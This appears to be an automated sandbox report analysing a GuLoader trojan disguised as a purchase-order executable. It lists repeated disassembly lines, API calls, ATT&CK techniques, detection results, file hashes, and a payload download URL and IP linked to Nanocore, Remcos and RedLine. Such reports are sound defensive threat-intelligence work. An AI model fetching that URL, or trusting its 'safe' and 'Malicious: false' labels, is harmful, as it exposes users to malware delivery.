      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF78A mov eax, dword ptr fs:[00000030h]5_2_348CF78A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348997A9 mov eax, dword ptr fs:[00000030h]5_2_348997A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489F7AF mov eax, dword ptr fs:[00000030h]5_2_3489F7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348107AF mov eax, dword ptr fs:[00000030h]5_2_348107AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D7B0 mov eax, dword ptr fs:[00000030h]5_2_3483D7B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E37B6 mov eax, dword ptr fs:[00000030h]5_2_348E37B6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34817152 mov eax, dword ptr fs:[00000030h]5_2_34817152
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34816154 mov eax, dword ptr fs:[00000030h]5_2_34816154
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34816154 mov eax, dword ptr fs:[00000030h]5_2_34816154
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480C156 mov eax, dword ptr fs:[00000030h]5_2_3480C156
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5152 mov eax, dword ptr fs:[00000030h]5_2_348E5152
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A9179 mov eax, dword ptr fs:[00000030h]5_2_348A9179
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E284 mov eax, dword ptr fs:[00000030h]5_2_3484E284
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E284 mov eax, dword ptr fs:[00000030h]5_2_3484E284
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34890283 mov eax, dword ptr fs:[00000030h]5_2_34890283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34890283 mov eax, dword ptr fs:[00000030h]5_2_34890283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34890283 mov eax, dword ptr fs:[00000030h]5_2_34890283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5283 mov eax, dword ptr fs:[00000030h]5_2_348E5283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484329E mov eax, dword ptr fs:[00000030h]5_2_3484329E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484329E mov eax, dword ptr fs:[00000030h]5_2_3484329E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348202A0 mov eax, dword ptr fs:[00000030h]5_2_348202A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348202A0 mov eax, dword ptr fs:[00000030h]5_2_348202A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov ecx, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A72A0 mov eax, dword ptr fs:[00000030h]5_2_348A72A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A72A0 mov eax, dword ptr fs:[00000030h]5_2_348A72A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov eax, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov eax, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov ecx, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov ecx, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348192C5 mov eax, dword ptr fs:[00000030h]5_2_348192C5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348192C5 mov eax, dword ptr fs:[00000030h]5_2_348192C5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B2D3 mov eax, dword ptr fs:[00000030h]5_2_3480B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B2D3 mov eax, dword ptr fs:[00000030h]5_2_3480B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B2D3 mov eax, dword ptr fs:[00000030h]5_2_3480B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F2D0 mov eax, dword ptr fs:[00000030h]5_2_3483F2D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F2D0 mov eax, dword ptr fs:[00000030h]5_2_3483F2D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348202E1 mov eax, dword ptr fs:[00000030h]5_2_348202E1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Process created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Code function: 0_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess

      Stealing of Sensitive Information

      Source: Yara match
      File source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match
      File source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 11 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 11 Process Injection | NTDS | 23 System Information Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Source | Detection | Scanner | Label |
|---|---|---|---|
| Purchase Order Purchase Order Purchase Order Purchase Order.exe | 27% | ReversingLabs | Win32.Trojan.Guloader |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | 3% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://185.222.57.90/zFSrvbrRquo53.bin | 0% | Avira URL Cloud | safe |
| http://185.222.57.90/zFSrvbrRquo53.binlb | 0% | Avira URL Cloud | safe |
      No contacted domains info
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://185.222.57.90/zFSrvbrRquo53.bin | false | Avira URL Cloud: safe | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | high |
| http://www.ftp.ftp://ftp.gopher. | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | high |
| http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | high |
| http://nsis.sf.net/NSIS_ErrorError | Purchase Order Purchase Order Purchase Order Purchase Order.exe | false | | high |
| http://185.222.57.90/zFSrvbrRquo53.binlb | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 185.222.57.90 | unknown | Netherlands | 51447 | ROOTLAYERNETNL | false |
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1557894
                Start date and time:2024-11-18 18:09:09 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 26s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
                Detection:MAL
                Classification:mal80.troj.evad.winEXE@3/8@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 47
                • Number of non-executed functions: 298
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: Purchase Order Purchase Order Purchase Order Purchase Order.exe
| Time | Type | Description |
|---|---|---|
| 12:11:48 | API Interceptor | 3x Sleep call for process: Purchase Order Purchase Order Purchase Order Purchase Order.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 185.222.57.90 | NK098765434567890-87654345678.exe | malicious | Nanocore | |
| | NAC0098765434567890-09876.exe | malicious | Nanocore | |
| | RHK098760045678009000.exe | malicious | Nanocore | |
| | FHKPO098765432345.exe | malicious | Remcos | |

No context

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| ROOTLAYERNETNL | 9dOKGgFNL2.exe | malicious | RedLine | 45.137.22.126 |
| | RFQ List and airflight 2024.pif.exe | malicious | PureLog Stealer | 45.137.22.174 |
| | Calyciform.exe | malicious | GuLoader | 45.137.22.248 |
| | I5pvP0CU6M.exe | malicious | RedLine | 45.137.22.248 |
| | gLsenXDHxP.exe | malicious | RedLine | 185.222.58.240 |
| | DEVIS + FACTURE.exe | malicious | Remcos, GuLoader | 45.137.22.126 |
| | PZNfhfaj9O.exe | malicious | RedLine | 185.222.58.80 |
| | ZxS8mP8uE6.exe | malicious | RedLine | 45.137.22.123 |
| | nu28HwzQwC.exe | malicious | RedLine | 185.222.58.52 |
| | DKO6uy1Tia.exe | malicious | RedLine | 45.137.22.70 |

No context

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll | MG-Docu6800001.exe | malicious | GuLoader | |
| | Fac.exe | malicious | GuLoader, Snake Keylogger | |
| | Factura Honorarios 2024-11-17.exe | malicious | GuLoader, Snake Keylogger | |
| | JOSHHHHHH.exe | malicious | GuLoader, Snake Keylogger | |
| | rCEMG242598.exe | malicious | GuLoader, Snake Keylogger | |
| | SBSLMD5qhm.msi | malicious | Metasploit | |
| | mU4lYkmS6K.exe | malicious | CobaltStrike | |
| | SBSLMD5qhm.msi | malicious | Metasploit | |
| | mU4lYkmS6K.exe | malicious | CobaltStrike | |
| | TouchEn_nxKey_32bit.exe | malicious | Unknown | |

                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):11776
                                            Entropy (8bit):5.890541747176257
                                            Encrypted:false
                                            SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                            MD5:75ED96254FBF894E42058062B4B4F0D1
                                            SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                            SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                            SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 3%
                                            Joe Sandbox View:
                                            • Filename: MG-Docu6800001.exe, Detection: malicious
                                            • Filename: Fac.exe, Detection: malicious
                                            • Filename: Factura Honorarios 2024-11-17.exe, Detection: malicious
                                            • Filename: JOSHHHHHH.exe, Detection: malicious
                                            • Filename: rCEMG242598.exe, Detection: malicious
                                            • Filename: SBSLMD5qhm.msi, Detection: malicious
                                            • Filename: mU4lYkmS6K.exe, Detection: malicious
                                            • Filename: SBSLMD5qhm.msi, Detection: malicious
                                            • Filename: mU4lYkmS6K.exe, Detection: malicious
                                            • Filename: TouchEn_nxKey_32bit.exe, Detection: malicious
                                            Reputation:moderate, very likely benign file
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):249837
                                            Entropy (8bit):1.2410746997695157
                                            Encrypted:false
                                            SSDEEP:768:d6sbjlB29qJBBoYbES9BCDKXC9HOak6p6MDrQsv8Ajldp8tEcf0TeMhz3CqXuwl7:tf1wx3et4e+lL5WwgzfZTc
                                            MD5:F1A91A75CAAA712680DA4475E1CDA954
                                            SHA1:C341696CBB8AF494821F8D16EA5E30B7827F5393
                                            SHA-256:79C33E51A0D2271F4252D793D8B9BCEF9F1F817FF3E61C94ECC59E615EC68DCE
                                            SHA-512:F43E478ADCCAF2CBD9FF9F2A4F920B63F53A82E028CD5ADFB41896EC04EB626FD15E283CB35D8C4D2A95EA8B5A7E59102A8A306C4DF60375C257A04150616906
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:TTComp archive data, binary, 4K dictionary
                                            Category:dropped
                                            Size (bytes):40687
                                            Entropy (8bit):4.5997894189869815
                                            Encrypted:false
                                            SSDEEP:384:KydpqkEFLRpyBDIag9EJG15JghsD4q3R3TD/FS0v29Akde6QYqOmN3LIV9re3bef:woFgH1EsM8H/UakYEI7I8LLgk4P
                                            MD5:35D47296CFB14E694BC97D22A92D42A1
                                            SHA1:BD0C529FFF26F900DB7948353F87377A31D0890D
                                            SHA-256:52716A62B0CE128607785167F560D0890D4C79CFEF11E677945720D4B691F858
                                            SHA-512:925F88965A2CF617F060E3A5464B8E601C4C5F963FBD955FE35AD7F72759C72E44742486295F51342DB8633600E5F97FF764E0222DD6B53931F93303F9407BE0
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 600x600, segment length 16, progressive, precision 8, 337x200, components 1
                                            Category:dropped
                                            Size (bytes):5453
                                            Entropy (8bit):7.8833870423876355
                                            Encrypted:false
                                            SSDEEP:96:Jh/2gZ62nmh8h8hMA8cZZ5wq1dJlH999YqYYYSJ9nv79i2+7nllbx0:j+gZ62nypZsqnJlH999Lv7I7a
                                            MD5:1732F2BFFA1308AABB19AA7006DFE151
                                            SHA1:80974B7DC8AFF2267C3502433C9DBDCCE04BD68C
